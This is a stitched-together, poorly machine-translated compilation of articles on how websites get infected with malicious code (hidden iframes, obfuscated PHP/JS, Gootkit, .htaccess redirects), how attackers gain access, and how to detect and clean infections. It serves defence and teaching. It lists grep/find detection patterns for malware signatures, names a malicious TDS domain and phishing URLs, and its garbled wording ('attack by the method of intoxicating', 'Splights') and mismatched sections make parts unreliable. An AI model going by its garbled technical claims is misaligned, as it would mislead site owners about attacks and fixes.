Malicious web page. What is malicious code. Introduction. Cybercrime: trends and development

  • users complain that the website is blocked by a browser and / or programs
  • the website is included in the Black Google list or to another database of malicious URLs.
  • there have been serious changes in the volume of traffic and / or in search engine rankings
  • website does not work as it should, gives errors and warnings
  • after visiting the website, the computer behaves strange.

Often malicious code It remains unnoticed for a long time, especially in case of infection of very complex malware. Such malicious software is usually strongly described to mislead and administrators of websites, and antivirus programs; It changes the domain names all the time to which the users are redirected, thus the black lists. If there is not one of the above symptoms, this is a good figure of your server cleanliness, although, alas, not 100%; Therefore, stay vigilant to any suspicious activity.

The most obvious sign of infection with any malicious software is the presence of a malicious / suspicious code in one or more files - mainly in HTML, PHP or JS format, and for some time the ASP / ASPX. This code is not easy to find possession of at least the basics of programming and website development. In order for the reader better, it looks like a malicious code, we give a few examples of the most common infection of web pages.

Example 1: Simple redirection

The oldest and most simple methodUsed cybercriminals, is adding a simple HTML iframe tag to the HTML file code on the server. The address used to load the malicious website in IFRAME is specified as the SRC attribute; The Visibility attribute with the "Hidden" value makes the Frame invisible to the user attending the website.

Figure 1: Malicious IFRAME inside the HTML website of the Website

Another method of making a malicious script in the user browser is the introduction of links to this script to the HTML file as the SRC attribute in Script tags or IMG:

Figure 2: Examples of malicious links

Recently, there are increasingly cases when the malicious code is dynamically generated and implemented in the HTML code of malicious JS or PHP scripts. In such cases, the code is visible only in the representation of the source code of the page from the browser, but not in physical files on the server. Cybercriminals can additionally determine the conditions when the malicious code must be generated: for example, only when the user moved to a site from certain search engines or opened a website in a particular browser.

To deceive and the owner of the website, and antivirus software, as well as make a malicious code, cybercriminals use a variety of code obfuscation methods.

Example 2: "Error 404: Page not found"

In this example, malicious code is embedded in the message template, which is displayed when the specified object was not found on the server (the well-known "error 404"). In addition, the index.html / index.php files are implemented by a link to any non-existent element in order to imperceptibly call this error each time a user has been visited by the user's infected web page. This method can provoke some confusion: a person responsible for the website receives a message that a certain antivirus solution marked the website as infected; After the surface check, it turns out that the malicious code was found in the object, which apparently does not exist; This leads to a temptation to assume (erroneously) that it was a false alarm.

Figure 3. Trojan.js.iframe.zs - Malicious script in the error message template 404

In this particular case, malicious code was obfussed. After deobfuscation, we can see that the purpose of the script is the introduction of the IFRAME tag, which will be used to redirect users to a malicious URL.

Figure 4. Trojan.js.iframe.zs - malicious code after deobfuscation

Example 3: Selective Mal Code Implementation

A similar code can be generated and join dynamically (i.e., depending on the specific conditions) to all HTML files located on the server using a malicious PHP script downloaded to the same server. The script shown in the following example checks the Usergent parameter (which is sent to the user browser, as well as search bots) and does not add a malicious code if the website is scanned by the bot or if site visitors use Opera, or Safari browsers. Thus, users of browsers invulnerable to a specific exploit used for attack will not be redirected to this exploit. It is also worth noting that comments in the code are deliberately misleading, leading to the idea that this script has something to do with the bot statistics.

Figure 5. Trojan.php.iframer.e - Code infecting PHP script

This method can also be used in the opposite direction: cybercriminals can implement references leading to illegal, dubious or malicious content (spam, spyware, software, phishing resources) only if the search bot entered the website. The purpose of such an attack is the so-called black optimization - the mechanism of raising the position of the cyber-crime resource in the search for extradition. Such malicious software is usually directed to popular web portals with a high rating, and it is quite difficult to detect, since malicious code is never shown to the usual user. As a result, malicious websites receive a high rating in search engines and turn out to be in the upper stages of search results.

Example 4: Surface Obfucration

Infecting PHP scripts can also take other forms. The following are two examples discovered several months ago.


Figure 6. Trojan-downloader.php.kscript.a-pressure PHP script


Figure 12. Trojan-downloader.js.twetti.t - Malicious Code implemented in JS files

Finally known case mass infection Halfing, which uses random domain names. In the case of infection with this malware, you can detect the following code on your website:

Figure 13. A component version of code that redirects a domain to randomly generated

Example 6: "Gootkit" and Obfusing the entire file

The obfused malicious code is easy to detect among the rest of the clean code, and therefore recently cybercriminals came to mind the idea to comply with the contents of the file entirely, thus unreadable both embedded and legitimate code. It is impossible to separate the legitimate code from malicious, and you can cure the file only after it is decryption.

Fig. 14. File, described by malware "GootKit"

Get rid of the first level of obfuscation is easy, for this you just need to change eval function() On Alert () - or Print () in the case of the console - and run it on execution. The second level is somewhat more complicated: in this case, the domain name is used as a key to encrypt code.

Fig. 15: "Gootkit" - a second level of obfuscation

After decryption, you can see a malicious code that goes for the original contents of the file:

Fig. 16: "GootKit" - Deobfuscated code

Sometimes a malicious part turns out to be the second version of the malware, which was discussed in the previous example, and is used to generate a pseudo-random domain name for redirection.

Example 7: .htaccess

Instead of infection of scripts and HTML codes, cybercriminals can use the capabilities of some files, for example.htaccess. In such files, the administrator may define access rights to specific folders on the server, as well as under certain circumstances, redirect users to other URLs (for example, if the user comes from a mobile device browser, it is redirected to a mobile version of the website). It is not difficult to guess how cybercriminals use such functionality ...

Fig. 17: Malicious.htaccess.

In the example above, all users who find themselves on this website following the link in most major search engines (HTTP_Referer parameter) are redirected to a malicious URL. In addition, in this file.htaccess has a sufficiently large number of browsers and bots, for which the redirection is not made (the HTTP_USER_AGENT parameter). The redirection does not occur also if the web page is read from the cache (Referer \u003d\u003d Cache) or loaded from the same computer (Cookie parameter).

Such malware makes it possible to conduct more selective infections - for example, specific IP addresses can be excluded, and when viewing websites from a specific range of IP addresses - for example, owned by the company information security - The issuance of malicious results is absent.

Vectors of attacks and technology of infection

Regardless of the technologies used, cybercriminals need to find a method for delivering malicious files to a server or modifying files already existing on the server. The most primitive method for gaining access to the server is a hacking access password. To do this, cybercriminals can use the so-called attack by the method of intoxicating or its limited version - the embodiment of the Bruise (vocabulary attack). Such tactics usually requires a large amount of time and resources, therefore it is rarely used with massive infection of websites. Among the more popular scenarios are the operation of vulnerabilities and malware for the steal of passwords.

Using Content Management System Vulnerabilities / E-Commerce System

Most of the modern web content management platforms (such as content management system (CMS), e-commerce, control panel, etc.) are imperfect and have vulnerabilities that allow other persons without authentication to upload files to the server. And although the search for such vulnerabilities developers lead constantly, the release of patches takes a large amount of time; In addition, many users continue to use old versions of programs with plenty of errors. Most often vulnerabilities are naturally in the most popular platforms, such as WordPress, Joomla and Oscommerce.

A well-known example of such vulnerability is Timthumb, which is widely used by cybercriminals in a variety of DRIVE-BY scenarios. Timthumb - PHP module to resize images and create so-called graphic miniatures included in most CMS templates in open access. Vulnerability allows you to record files located on a remote machine to the server, to the cache directory. Another example is the SQL Injection vulnerability in Plesk Panel (version 10 and older), found in February 2012, allowing you to read databases and steal passwords that - until recently - stored explicitly. The registration data obtained in such a way was probably used with a recent mass web epidemic http://www.securelist.com/en/blog/208193624/who_is_attacking_me; https://www.securelist.com/ru/blog/208193713/runforestrun_gootkit_i_generirovanie_sluchasyynykh_domnykh_imen.

Using spyware to steal credentials to access the FTP server

In the most common web infesses (for example, Gumblar and Pegel), another method was successful. At the first stage, cybercriminals distribute malicious programs designed specifically to search and steal user names and passwords to FTP accounts by checking the FTP client settings or scanning network traffic. After finding malware of these registration data on an infected site administrator's site, the program establishes a connection to the FTP server and loads malicious scripts or writes their infected version instead of the original files. It goes without saying that as long as the computer of the account of the account is infected, the files stored on the server will again and again become inflated even after changing the registration data and restore the entire content from the net backup.

Objectives of cybercrime

What is the purpose of infection of websites?

  • forwarding users for exploits for an invisible installation of malicious programs on their computers;
  • forwarding users on spam, phishing and other malicious, illegal or unwanted content;
  • interception / theft of site visits / search queries.
  • promotion of malicious / illegal websites and websites containing spam (black optimization);
  • using server resources for illegal activity.

In essence, there is nothing new here: when wearing websites, cybercriminals moves the desire to get indirect profits.

Methods for elimination of malicious code

What if your site attacked hackers?

First, if you observe the symptoms that talk about a possible infection, it is necessary to immediately deactivate the website until the problem is eliminated. It is really extremely important because every moment of delay plays on the hand cybercriminals, allowing you to infect yet more computers and distribute infection throughout. You should check the server logs for suspicious activity, for example, strange requests from IP addresses in countries uncharacteristic for site visitors, etc. - It can be useful for detecting infected files and definitions, exactly how cybercriminals got access to the server.

But how to deal with malicious code?

Backup copy

The fastest and most reliable way to restore the entire contents of the server is using a clean backup. To make it effectively, it is also necessary to make a complete reinstall software that runs on the server (content management systems / CMF, e-commerce system, etc.). Of course, for this you need to use the latest, fully updated versions. After these actions, there should be no infected files on the server - provided that you erased all the contents before recovery, and the backup has been created before the attack starts.

Automatic check

If there is no net backup, you don't have anything to start fighting with malicious software. Fortunately, there are a number automated solutionsSuppose to find malicious code - including anti-virus products and online web scanners, such as http://sucuri.net/. None of them is ideal, but in the case of well-known / ordinary malicious software, they can all be very useful. Let's start with the fact that you can check the website using multiple online scanners. Some of them will not only determine whether your site is really infected, but also indicate a malicious code in your files. Then you can make a complete anti-virus check of all files on the server.

If you are the owner of the server or if a protective solution works on the server, on which you have rights to use, you can check on the server side. Make sure you have created a copy of your files, as some antivirus scanners do not treat infected files, but remove them! You can also download the contents of your server on local computer and check it with an antivirus solution for a stationary computer. The second option is preferable, since most modern anti-virus programs for stationary computers have a well-developed heuristic module. Malicious programs affecting websites, highly polymorphic: and if, when combating it, signature analysis is practically useless, heuristics allows them to be easily detected.

Manual removal

If automatic checking did not give results and the message about infection of your site arrive is still, the only way to get rid of malware is to find it manually and remove all malicious code. This difficult task may take a significant amount of time, since it is necessary to check each file - whether HTML, JS, PHP or configuration file - for malicious scripts. The examples above are just a small part of a variety of malware for websites, so the likelihood that malicious code on your site will be partially or completely different from these samples. Nevertheless, most modern malware for websites have some common featuresAnd these features will help in determining the problem.

Most of all, it is necessary to pay attention to the parts of the code that look unclear or unreadable. Code Obfusion - Technology, often used, is quite unusual for any other software related to websites. If you did not comply with the code yourself, you have any reason to have suspicion about it. But be careful - malicious will be not all the obfuscated code!

Similarly, not any malicious script is obfussed, so it makes sense to search if IFrame tags explicitly and other links to external resources in all your files. Some of them may be related to advertisements and statistics, but do not get on the fishing rod of specially formed URLs that can confuse, having a type of addresses of well-known and trusted portals. Do not forget to check the code of template error messages, as well as all files.htaccess.

Useful tools to search for malicious code on the server are undoubtedly GREP and FIND - utilities operating in mode command line, By default, in virtually all UNIX-based systems are included. Below are examples of their use in the diagnosis of the most common infections:

grep -Irs "iframe" *
grep -irs "Eval" *
grep -IS "Unescape" *
grep -RS "Base64_Decode" *
grep -irs "Var Div_Colors" *
grep -irs "var _0x" *
grep -RS "CorelibrariesHandler" *
grep -RS "PingNow" *
grep -RS "serchbot" *
grep -irs "km0ae9gr6m" *
grep -RS "C3284D" *
find. -IName "Upd.php"
find. -IName "* Timthumb *"

Grep description (from Linux manual): Print lines corresponding to the template; option -i means ignore the register; -R means recursive search, and -s prevents the display of error messages. The first of the listed commands is looking for iFrame Tag files; Three other are looking for the most obvious signs of obfuscation; The rest are looking for special lines associated with the largest known infection of websites.

As for FIND, the Linux manual indicates: search for files in the folder hierarchical structure; "." (Point) Indicates the current directory (so run the command data follows from the root directory or home (home) directory on the server), the -iname parameter determines the file to be signed. Can be used regular expressions To search for all files corresponding to some criteria.

Of course, you always need to know what to search - not all the results will indicate infection. Not bad to check suspicious parts of the code anti-virus scanner Or try to look for them in Google. It is very likely that you will find some answers - both for malicious and clean code. If you are still not sure if the file is infected, it is best to deactivate the website (just in case) before making any actions to seek advice to a specialist.

Very important!

In addition to cleaning files on the server, it is necessary to make a complete anti-virus check of all computers used to download and manage content on the server and change all data to access all accounts on the server (FTP, SSH, control panel, etc.) that you support .

Security Basics for Websites

Unfortunately, in most cases, removal of malicious code is not enough to get rid of infection once and forever. If your website is infected, it may be about the existence of vulnerabilities that allowed cybercriminals to implement malicious scripts to the server; And if you leave this problem without attention, new infection is waiting for you in the near future. To prevent this, you need to take appropriate measures to protect the server and computer / computers used to administer the server.

  • Using persistent passwords. Despite the triviality of this Council, it is really the basis of server security. It is necessary not only to change passwords after each incident and / or attack on the server - they must vary on a regular basis, for example, monthly. Good password must comply with the special criteria that can be found at www.kaspersky.com/passwords;
  • Regular update. You must also not forget about regular updates. Cybercriminals often exploit vulnerabilities in regardless of the purpose of a malicious program - whether it is directed to PC users or websites. All programs with which you manage your server / site content must be the most recent versionsAnd each security update must be installed immediately at its output. Using current versions of software and timely installation of all necessary patches will help reduce the risk of attack using exploits. A regularly updated list of famous vulnerabilities can be found on the site http://cve.mitre.org/;
  • Regular backup creation. Having a net copy of the server content in stock, you will save a lot of time and effort, not to mention that fresh backup copies can, in addition to the treatment of infection, it is very useful in solving other problems;
  • Regular file checks. Even in the absence of explicit symptoms of infection, it is recommended to periodically scan all files on the server for the identification of malicious code;
  • Ensuring PC security. Since a significant amount of malware for websites is distributed through the infected PCs, the security of a stationary computer used to manage your website is one of the priority aspects of the website security. Continuous support for cleanliness and security of your computer significantly increases the likelihood that your website will also be safe and protected from viruses.
  • Mandatory (but not sufficient) should be the following actions:
    • deleting unused programs;
    • deactivation of unnecessary services and modules;
    • setting the appropriate policies for individual users and user groups;
    • installing adequate access rights to specific files and directories;
    • disable files and web server directory;
    • maintaining event logs, regularly verified for suspicious activity;
    • use encryption and secure protocols.

Malicious software, designed to infect websites, can be a real nightmare for web administrators and Internet users. Cybercriminals continuously develop their technology, opening new exploits. The malware is rapidly distributed via the Internet, hitting servers and workstations. It is right to say that a reliable way to completely eliminate this threat does not exist. However, each website owner and every Internet user can make the Internet safer, observing the basic safety rules and constantly supporting the safety and cleanliness of their websites and computers.

Leave your comment!

Rubric :.

This article is focused on Internet networks and owners. information resources. The purpose of the article is to describe the methods of infection of websites of malicious code, possible consequences from this and methods of combating malware.

What is this malicious code, where does it come from and how dangerous it is?

Malicious code is a reference to a resource containing malware. The most encountered today is either a fake antivirus (Fake AntiVirus), or the submenu module for the issuance of search queries, or by sending spam. In some cases, malicious software can combine confidential data theft from a user's computer, for example, it can be passwords from administrative web management interfaces, passwords on FTP, accounts to online services.

1) Malicious reference leads to the traffic distribution system (TDS). The traffic distribution system allows you to redirect the visitor depending on the country, the operating system, the browser, the language used and other parts for various resources. These resources, in turn, contain malicious for this audience, or a given, vulnerable software. Moreover, in the case of a navigable link with an unforeseen browser attacker or version of the operating system, you will see either just a blank screen or, for example, search page Google. This makes a little difficult to identify malicious software. However, with a thorough analysis you can understand the logic of the system and protect against infection.
2) Malicious link leads to "Splights" for popular browsers and software products. "Splutes" are specially formed codes using vulnerabilities in the software for inconspicuous download and execution on a malicious software user. In this case, it is determined by the user and in the case of its vulnerability, infection occurs.

To hide the presence of a malicious code on the website it is encrypted, but there are cases and open code.

Example of encrypted malicious links:

We will carry out a small analysis of the structural of a malicious link:
domain name - Bestlotron.cn.
script - in.cgi (Sutra traffic distribution system)
scheme - Cocacola51

Malicious references with redirecting traffic distribution system in lately are the most encountered. In this case, the attacker, having access to the website and implementing a malicious reference to the traffic distribution system on its resource, can manage traffic from this website. In the Cocacola51 scheme, which is indicated in the example, it may be present not one malicious software. Thus, the traffic distribution system is just an intermediary between the visitor of a hacked website and malicious intruder.

The second example clearly demonstrates an encrypted malicious link. As a rule, for encryption are used simple algorithms And almost 99%, such links are easily decrypted.

After decryption, we get the following code:

Now we can also observe the address of the site, and familiar to us in the first example the script of the traffic distribution system with scheme 3.

Where does this code come from on websites and what can it be dangerous?
As a rule, manually websites no longer wake up. All long ago automated. For these purposes, hackers are written a lot like applied softwareand server applications. The most common process of automated implementing malicious links to websites is theft of Password FTP and further processing of this data by the IFRamer specialized application. If IFramer is simple - to connect to resources to the FTP accounts list, find files for a given mask, as a rule, these are the files of website index pages, and implement the ready-made malicious code. Therefore, after removing the code, many websites are infected again, even when changing all passwords of access, including FTP. The reason for this can serve the presence of a virus for stealing passwords on the computer from which the website administration is carried out.

There are cases where the owners of the websites on which malicious code appear is not serious about this issue. I agree, harm as such by the resource this code does not cause. Only visitors of the infected website are affected. But there are other parties to which I want to pay attention.

The website on which the malicious code is located is sooner or later in all sorts of sampling databases - Malware Site List, as well as search engines, such as Google or Yandex, can mark the infected website as a potentially dangerous. It will be extremely difficult to remove your resource from such a base. Also, it is not eliminated sooner or later to get "Abuzu" - a complaint from website visitors. In this case, there is a possibility of both blocking the domain name of the website and blocking its IP address. There were cases when whole subnets were blocked due to one infected website.

How to protect yourself from the emergence of malicious codes on their resources? To do this, it is necessary to carry out a number of IB requirements:

1) Install on the working computer from which the anti-virus software website is administered, preferably licensed with daily updated bases.
2) Install and configure the firewall so that all traffic can be checked when working with the network and, in the case of appeal to suspicious hosts, it was possible to block it.
3) use sophisticated passwords On administrative interfaces and access to FTP and SSH services.
4) Do not save passwords in Total Commander, Far and other programs file managers. As a rule, almost all Trojan programs are already able to capture this data and cross the attacker.
5) do not open and not run the received e-mail Or downloaded from the Internet files, after without checking them with anti-virus software.
6) Update the software installed on the computer. Timely install patches to operating systems and update application software. Sometimes the programs that you use everyday can serve the hole in the system for the penetration of malware. In particular, Adobe Acrobat Reader, Flash Player., programs from the MS Office package, etc.

If you follow all the protection measures described above, but detected a malicious code on their resource, it can also be a hosting provider, or rather the server setting on which your resource is located. In this case, you need to contact your hosting provider support and ask them to reveal and eliminate the cause of the incident.

As you know, in Uzbekistan, in September 2005, a response service was created by the UZ-CERT computer incidents. Specialists of the service other than their main responsibilities also perform work on the detection of malicious codes on sites in the national domain zone. For these purposes, a number of application programs were written to automate the main points, but, of course, a manual viewing of suspicious on infection of websites also plays an important role. Sometimes well-disguised malicious code underwent "obfuscations" - changing the code structure, it is impossible to detect automatic tools. Information about all detected infected websites is published on the service website, as well as in the UZ-CERT section on Uforum.uz. Owners of infected resources receive alerts, consultations and assistance to eliminate threats and further protect their systems. We sincerely hope that this work benefits users of the Internet and helps to avoid mass infection personal computers Malicious software.

In classmates

The site started a virus, and, like any infected object, your web resource turned into one big source of trouble: now it not only does not make a profit, but also departs your reputation on the Internet, buyers, search engines and even a hoster are turned away from you.

You stay one for one with your problem and are trying to solve it with our own forces, not addressing professionals, but following the advice of "specialists" from the forums. Or order the treatment of the site where "cheaper". What to do, because it always wants to solve the problem as quickly as possible and with the smallest costs. But is such an approach always justified?

We present to your attention the top 7 mistakes of the past year who have committed a web master, trying to restore the performance of the site after hacking and infection.

Error number 1. Restoration of the site from the backup as a way to get rid of malicious code

Very often, the problem of infection with a malicious code of a web master is trying to solve the site kickback to the last clean version. And continue to restore the web project every time the virus on the site again makes it felt. Alas, it is an uncomfortable and very risky option.

Correct solution: The site needs to be treated and put protection against hacking to avoid re-infection. First, the site content can be updated, new plugins can be installed on the site, changes can be made to the site scripts. Every rollback back means that you lose the results of the works of all recent days. But there is a more important reason for the cardinal struggle with hacking: what if a hacker one day decides to destroy your site completely, because it has access to your web resource?

Error number 2. Deceiving deception to conclusion of the site from under sanctions

The site falls on the list of "threatening computer security or a mobile device ..." because of the virus on the site or the reward of visitors to the infected resource. In the web wizard pane, examples of infected pages are displayed, but a tricky or ignorant webmaster instead of solving a problem (search and delete a malicious source) deletes some pages that show search engines in infection examples. Or, as an option, the entirely block access to the site using the rules in robots.txt, naively believing that it blocks and access the antivirus bot to the site.

Correct solution: You need to find a viral code on the site and remove it. Prohibit indexation is not only useless, but also dangerous. First, site pages can fall out of the search index. Well, and secondly, the robot of the anti-virus service works according to the rules other than the rules of the search engine, and the prohibition of indexing does not affect it.

Error number 3. Using a malicious code scanner with incompetent experts

In order to save or for some other reasons, the treatment of the site begins to be engaged in sufficiently prepared specialist who cannot determine 100% whether the fragment allocated to the malicious code scanner is really dangerous. As a result, two extremes can be observed: absolutely all suspicions of the virus are removed, which leads to the site breakdown, or malicious code is eliminated not completely, which provokes recurrence.

Correct solution: Obviously, professionals should be engaged in treating a web resource. The report of malware scanners are false responses, since the same fragment can be used both in legitimate code and hacker. You need to analyze each file, otherwise you can remove the critical elements, which can lead to failures in the site or its full breakdown. Or, on the contrary, there is a risk of not recognizing hacker shell, which will lead to a re-infection of the web resource.

Error number 4. Ignoring messages (in the webmaster panel) on the presence of malicious code on the site

Notification of the presence of a malicious code on the site in the web wizard panel can be non-permanent. Today the system writes that the virus on your site, and tomorrow is silent. The site owner is more pleasant to think that there has been some kind of failure in the system, and its website is out of any suspicion. However, in practice everything is wrong. Exist different types infections. Malicious code can appear on the site only for some time, and then disappear. This means that when checking the site of the Antivirus bot search engine Malcity can be detected, and with the other - no. As a result, the webmaster is "relaxing" and begins to ignore the dangerous message: "Why waste time for treatment, because the site did not blocked."

Correct solution: If the site has no malicious activity, most likely yours, web resource hacked and infected. Viruses on the site do not appear by themselves. The fact that the search engine has discovered a suspicious code on the site, and then "silent", not only should not be ignored by a webmaster, but, on the contrary, it should serve as alarm signal. Who knows how your resource will be operated tomorrow? - Spam, phishing or redirects. You need to immediately perform a site scanning for hacker backdors, shells, to treat and protect against hacking.

Error number 5. Treatment of sites by freelancerames-non-professional.

In principle, working with freelancers in this issue is no different from other spheres. Cheap - not always qualitatively, but almost always without guarantees and contractual relations. Most freelancers who do not specialize on site security issues work with the consequences of a hacker attack, but not with the cause - website vulnerabilities. This means that the site can hack reuse. Worse, there are also unscrupulous performers who can suck another malicious code on the site, steal the database, etc.

Correct solution: Contact a specialized company that deals with the treatment and protection of sites from hacking. Employees of such companies every day remove malicious code, see the mutation of viruses and follow the evolution of hacker attacks. The dark burglary market is not in one place, it develops and requires constant monitoring and relevant response to the treatment and protection of the site from unauthorized intrusions.

Error number 6. Daily / weekly removal of the same virus from the site.

This problem concerns special "enthusiasts", which are ready to eliminate the effects of hacking on a regular basis. Such webmasters already know which specifically the code will be put on the site, specifically where and when it happens. So you can endlessly fight with a mobile redirect, which is introduced daily at 09-30 by an attacker to file.htaccess and redirects your mobile traffic On the site for the sale of Viagra or Pornkontent. Only here is not enough: the hacker bot does it in automatic modeAnd you have to perform a manual removal operation. Not honest after all, right?

Correct solution: You can endlessly delete the consequences (viruses, redirects, etc.), but more efficiently check the site for malicious and hacker scripts, remove them and install protection against hacking so that more virus code does not appear. And the released time to spend more effectively. The main thing, remember that hacker already has access to your site, which means that next time he may not limit the harmful code to you, but use your site for more serious cyber crimes.

Error number 7. Treatment of an involved site by antivirus for a computer

The concept of "antivirus" for some webmasters is universally, and they are trying to cure a hacked and infected site using an antivirus intended for a computer. The backup of the site is done and the desktop version of antivirus is checked software. Alas, this treatment is not able to give the desired results.

Correct solution: Viruses on the site and on the computer - not the same thing. To check the site you need to use specialized software or access specialists. Desktop antiviruses, no matter how good they are, are not intended to treat websites from viruses, since their database is focused on viruses and Trojans on the computer.

That's all. Do not step on the same rake!

Currently most computer attacks happens when visiting malicious web pages. The user can be misleading by providing confidential data of phishing site or become a victim of the DRIVE-by Download attack using browser vulnerabilities. Thus, modern antivirus should provide protection not only directly from malicious software, but also from dangerous web resources.

Antivirus solutions are used various methods To identify sites with malware: Comparison of the signature database and heuristic analysis. Signatures are used to accurately determine known threats, while heuristic analysis determines the likelihood of hazardous behavior. Using the virus base is a more reliable method that provides a minimum number of false positives. but this method Does not allow detecting unknown newest threats.

The threat that appeared at first should be detected and analyzed by the staff of the Anti-virus vendor laboratory. Based on the analysis, an appropriate signature is created, which can be used to find malicious software. On the contrary, the heuristic method is used to identify unknown threats on the basis of suspicious behavioral factors. This method estimates the likelihood of danger, therefore false responses are possible.

When malicious references are detected, both methods can work simultaneously. To add a dangerous resource to the list of prohibited sites (BlackList), it is necessary to analyze by downloading the contents and scanning it using an antivirus or intrusion detection system (INTRUCTION SYSTEM).

Below is the log of the Suricata IDS system event log when blocking exploits:

An example of an IDS system report indicating threats defined by signatures:

Example of warning aD-AWARE Antivirus When visiting a malicious site:

Heuristic analysis is performed on the client side to verify the visited sites. Specially designed algorithms warn the user if the resource visited is in dangerous or suspicious characteristics. These algorithms can be built on a lexical analysis of content or on the assessment of the location of the resource. The lexical model of definition is used to warn the user during phishing attacks. for example URL address View " http://paaypall.5gbfree.com/index.php." or " http://paypal-intern.de/secure/"Easily defined as phishing copies of known payment system "PayPal".

Analysis of resource accommodation collects information about hosting and a domain name. Based on the data obtained, the specialized algorithm determines the degree of danger of the site. These data usually include geographic data, information about the recorder and the person who registered the domain.

Below is an example of placement of several phishing sites on one IP address:

Ultimately, despite the many ways to evaluate sites, neither it technique can give a 100% guarantee protection of your system. Only the joint use of several computer security technology allows you to give a certain confidence in protecting personal data.